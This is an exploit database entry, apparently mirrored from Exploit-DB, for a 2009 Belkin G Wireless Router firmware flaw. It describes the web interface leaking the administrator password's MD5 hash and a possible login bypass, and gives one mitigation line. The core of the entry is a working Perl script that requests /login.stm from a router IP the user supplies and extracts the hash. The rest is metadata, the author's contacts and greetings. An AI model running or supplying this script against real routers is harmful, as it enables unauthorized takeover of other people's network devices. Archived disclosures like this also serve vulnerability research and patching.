Belkin G Wireless Router Admin Exploit

vendor:

G Wireless Router

by:

Aodrulez

7.5

CVSS

HIGH

Bypass Login

287

CWE

Product Name: G Wireless Router

Affected Version From: 5.00.12

Affected Version To: 5.00.12

Patch Exists: NO

Related CWE: N/A

CPE: h:belkin:g_wireless_router

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

Belkin G Wireless Router Admin Exploit

The router's web interface reveals the Administrator Password's MD5 Hash. Its even possbile to bypass the login completely.

Mitigation:

Ensure that the router's web interface is not accessible from the public internet.

Source

Exploit-DB raw data:

+-----------------------------------------+
| Belkin G Wireless Router Admin Exploit. |
+-----------------------------------------+

Firmware Version : 5.00.12 (Sep 10 2009 19:54:12)
Boot Version     : 1.18
Hardware         : F5D7234-4 v5 (01)
Author           : Aodrulez.
Email            : f3arm3d3ar@gmail.com
Twitter          : http://twitter.com/Aodrulez


+---------+
| Details |
+---------+

The router's web interface reveals the Administrator Password's
MD5 Hash. Its even possbile to bypass the login completely.


+---------+
| Exploit |
+---------+

#/usr/bin/perl
use LWP::Simple;
print "\n Aodrulez's 'Belkin G Wireless Router' Admin Exploit\n";
print "\n ---------------------------------------------------\n\n";
print "[+] Enter the Router's IP Address : ";
my $password=<STDIN>;
chomp($password);
$password=get("http://".$password."/login.stm") or die "\n[!] Wrong IP Address?\n";
my @aod=$password =~ m/var password = "(.*)";/g;
print "[+] Admin Password = ".@aod[0]." (MD5 Hash).\n\n";



+-------------------+
| Greetz Fly Out To |
+-------------------+
    
   
1] Amforked()          : My Mentor.
2] The Blue Genius     : My Boss.
3] str0ke (milw0rm)
4] www.orchidseven.com
5] www.malcon.org
6] www.isac.org.in
  
  
+-------+
| Quote |
+-------+
  
"Music is my Religion & Jimmy Page, my GOD." - Aodrulez